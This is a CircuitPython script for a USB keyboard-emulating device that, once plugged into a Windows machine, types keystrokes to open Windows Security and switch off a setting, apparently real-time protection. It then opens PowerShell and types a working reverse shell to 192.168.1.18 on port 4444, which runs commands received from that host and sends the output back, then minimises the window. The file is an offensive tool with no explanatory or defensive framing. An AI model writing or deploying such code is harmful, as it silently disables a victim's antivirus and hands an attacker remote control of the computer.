import time
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keycode_win_la import Keycode
from adafruit_hid.keyboard_layout_win_la import KeyboardLayout

kbd = Keyboard(usb_hid.devices)
layout = KeyboardLayout(kbd)
time.sleep(3)

kbd.press(Keycode.GUI)
kbd.release_all()
time.sleep(1)
layout.write("windows security")
kbd.press(Keycode.ENTER)
kbd.release_all()
time.sleep(1.9)
kbd.press(Keycode.ENTER)
time.sleep(1.5)
kbd.release_all()
time.sleep(0.2)
kbd.press(Keycode.TAB)
kbd.release_all()
kbd.press(Keycode.TAB)
kbd.release_all()
kbd.press(Keycode.TAB)
kbd.release_all()
time.sleep(0.2)
kbd.press(Keycode.ENTER)
kbd.release_all()
time.sleep(0.2)
kbd.press(Keycode.SPACE)
kbd.release_all()
time.sleep(0.5)
kbd.press(Keycode.LEFT_ARROW)
kbd.release_all()
time.sleep(0.2)
kbd.press(Keycode.ENTER)
kbd.release_all()
time.sleep(0.2)
kbd.press(Keycode.ALT, Keycode.F4)
kbd.release_all()
time.sleep(0.2)
kbd.press(Keycode.GUI, Keycode.R)
kbd.release_all()
time.sleep(0.2)
layout.write("powershell")
kbd.press(Keycode.ENTER)
kbd.release_all()
time.sleep(5)
layout.write('$client = New-Object System.Net.Sockets.TCPClient("192.168.1.18",4444)')
kbd.press(Keycode.ENTER)
kbd.release_all()
time.sleep(1)
layout.write("$stream = $client.GetStream()")
kbd.press(Keycode.ENTER)
kbd.release_all()
time.sleep(0.5)
layout.write("[byte[]]$bytes = 0..65535|%{0}")
kbd.press(Keycode.ENTER)
kbd.release_all()
time.sleep(0.5)
layout.write('while(($i = $stream.Read($bytes,0,$bytes.Length)) -ne 0){$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0,$i); $sendback = (iex $data 2>&1 | Out-String); $sendback2 = $sendback + "PS" + (pwd).Path + "> "; $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}')
kbd.press(Keycode.ENTER)
kbd.release_all()
kbd.press(Keycode.GUI, Keycode.DOWN_ARROW)
kbd.release_all()
